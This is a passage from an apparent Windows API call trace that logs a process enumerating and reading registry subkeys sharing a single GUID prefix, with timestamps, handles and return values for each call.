lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.658] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.658] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x3, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.658] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.658] _errno () returned 0x4a5bed55a0 [0261.659] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-11", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.659] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.659] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x4, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.659] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.659] _errno () returned 0x4a5bed55a0 [0261.659] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-12", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.659] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0xa0) returned 0x0 [0261.659] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x5, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.659] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.659] _errno () returned 0x4a5bed55a0 [0261.659] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-13", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.660] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x80) returned 0x0 [0261.660] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x6, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.660] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.660] _errno () returned 0x4a5bed55a0 [0261.660] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-14", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.660] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x80) returned 0x0 [0261.660] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x7, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.660] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.660] _errno () returned 0x4a5bed55a0 [0261.660] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-15", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.660] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0261.661] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x8, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.661] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.661] _errno () returned 0x4a5bed55a0 [0261.661] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-16", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.661] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.661] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x9, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.661] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.661] _errno () returned 0x4a5bed55a0 [0261.661] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-17", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.661] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x80) returned 0x0 [0261.661] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0xa, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.661] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.662] _errno () returned 0x4a5bed55a0 [0261.662] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-18", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.662] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x80) returned 0x0 [0261.662] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0xb, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.662] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.662] _errno () returned 0x4a5bed55a0 [0261.662] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-19", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.662] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.662] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0xc, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.662] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.662] _errno () returned 0x4a5bed55a0 [0261.663] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-2", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.663] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0261.663] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0xd, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.663] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.663] _errno () returned 0x4a5bed55a0 [0261.663] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.663] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.663] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0xe, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.663] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.663] _errno () returned 0x4a5bed55a0 [0261.663] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-21", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.663] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0261.664] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0xf, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.664] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.664] _errno () returned 0x4a5bed55a0 [0261.664] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-22", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.664] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0261.664] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x10, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.664] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.664] _errno () returned 0x4a5bed55a0 [0261.664] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-23", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.664] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.664] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x11, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.665] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.665] _errno () returned 0x4a5bed55a0 [0261.665] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-24", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.665] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x70) returned 0x0 [0261.665] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x12, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.665] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.665] _errno () returned 0x4a5bed55a0 [0261.665] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-25", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.665] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0261.665] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x13, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.665] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.666] _errno () returned 0x4a5bed55a0 [0261.666] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-26", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.666] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x60) returned 0x0 [0261.666] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x14, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.666] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.666] _errno () returned 0x4a5bed55a0 [0261.666] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-27", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.666] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x60) returned 0x0 [0261.666] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x15, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.666] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.666] _errno () returned 0x4a5bed55a0 [0261.666] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-28", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.667] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0261.667] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x16, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.667] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.667] _errno () returned 0x4a5bed55a0 [0261.667] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-29", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.667] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x50) returned 0x0 [0261.667] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x17, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.667] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.667] _errno () returned 0x4a5bed55a0 [0261.667] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-3", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.667] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x60) returned 0x0 [0266.730] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x18, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.730] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.730] _errno () returned 0x4a5bed55a0 [0266.731] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-30", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.731] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x70) returned 0x0 [0266.731] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x19, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.731] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.731] _errno () returned 0x4a5bed55a0 [0266.731] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-31", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0266.731] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x40) returned 0x0 [0266.731] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1a, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-32", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0266.731] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0266.731] _errno () returned 0x4a5bed55a0 [0266.732] RegOpenKeyW (in: 